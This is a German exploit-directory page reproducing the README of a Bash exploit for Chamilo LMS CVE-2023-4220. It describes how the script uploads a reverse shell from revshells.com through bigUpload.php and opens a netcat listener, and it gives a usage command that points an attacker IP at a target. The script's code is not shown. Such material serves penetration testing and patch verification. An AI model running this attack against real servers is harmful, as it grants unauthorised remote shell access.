Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — Refurbish Chamilo LMS CVE-2023-4220 Exploit in Bash geschrieben | Kitploit
Tools/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

Refurbish Chamilo LMS CVE-2023-4220 Exploit in Bash geschrieben

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
1vor 1 JahrNoch nicht geprüft
Teilen

Chamilo LMS CVE-2023-4220 Exploit

Übersicht

Dieses Skript nutzt eine Remote-Code-Execution-Schwachstelle (RCE) in Chamilo LMS Versionen ≤ v1.11.24 aus. Die Schwachstelle (CVE-2023-4220) existiert aufgrund einer uneingeschränkten Datei-Upload-Funktionalität in der bigUpload.php-Funktion von Chamilo LMS, die es Angreifern ermöglicht, beliebige Dateien (wie Web-Shells) hochzuladen und auszuführen, was zu einer vollständigen Remote-Code-Ausführung auf dem Server führt.

Dieses Skript wurde von Divine Clown verbessert, um den Ausnutzungsprozess zu optimieren. Es generiert automatisch eine Reverse-Shell-Datei, lädt sie auf das Ziel hoch und startet einen Listener, der dem Angreifer direkten Zugriff auf die Shell gewährt.


CVE-Details

  • CVE-ID: CVE-2023-4220
  • Betroffene Software: Chamilo LMS ≤ v1.11.24
  • Schwachstellentyp: Remote Code Execution (RCE)
  • Angriffsvektor: Uneingeschränkter Datei-Upload in /main/inc/lib/javascript/bigupload/inc/bigUpload.php

Funktionen

  • Lädt automatisch eine Reverse-Shell von revshells.com basierend auf der IP und dem Port des Angreifers herunter.
  • Lädt die Reverse-Shell über den verwundbaren bigUpload.php-Endpunkt hoch.
  • Löst die Shell aus und öffnet einen Netcat-Listener für den direkten Zugriff.

Verbesserung durch Divine Clown:

  • Alle Zwischenschritte (Herunterladen der Shell, Hochladen usw.) werden ausgeblendet; nur die resultierende Reverse-Shell wird angezeigt, um die Nutzung zu vereinfachen.

Verwendung

root@kitploit:~
./CVE-2023-4220.sh -i <angreifer_ip> -p <port> -h <host_link>

Parameter:

  • -i <angreifer_ip>: Die IP-Adresse des Angreifers für die Reverse-Shell.
  • -p <port>: Der Port, auf dem der Netcat-Listener gestartet wird.
  • -h <host_link>: Die vollständige URL der verwundbaren Chamilo-LMS-Instanz.

Beispiel:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

Voraussetzungen

  • Netcat muss auf Ihrem Rechner installiert sein.
  • Stellen Sie sicher, dass die Zielversion von Chamilo LMS anfällig ist (≤ v1.11.24).
  • Sie benötigen die entsprechenden Berechtigungen für Penetrationstests oder Exploitation.

Technische Aufschlüsselung

  1. Das Skript lädt eine Reverse-Shell von revshells.com herunter, die dynamisch basierend auf der IP und dem Port des Angreifers generiert wird.
  2. Die Reverse-Shell wird auf den verwundbaren bigUpload.php-Endpunkt hochgeladen.
  3. Die hochgeladene Datei wird durch Aufrufen ihrer URL auf dem Server ausgeführt.
  4. Ein Netcat-Listener wird gestartet, und sobald die Datei ausgelöst wird, wird eine Reverse-Shell-Verbindung hergestellt, die dem Angreifer Befehlszeilenzugriff gewährt.

Rechtlicher Hinweis

Dieses Tool ist ausschließlich für Bildungszwecke und Testumgebungen bestimmt, in denen Sie ausdrücklich die Erlaubnis haben, Schwachstellen auszunutzen. Unbefugter Zugriff auf Systeme ist illegal und kann zu strafrechtlichen Konsequenzen führen. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.


Danksagungen

  • Ursprünglicher Exploit-Autor: Ziad Sakr @Ziad-Sakr
  • Verbesserungen und Verfeinerungen: Ich (Divine Clown)

Sie können die README gerne weiter anpassen, falls Sie zusätzliche Informationen oder Formatierungen einfügen möchten. Lassen Sie mich wissen, wenn Sie noch etwas benötigen.

Tool herunterladen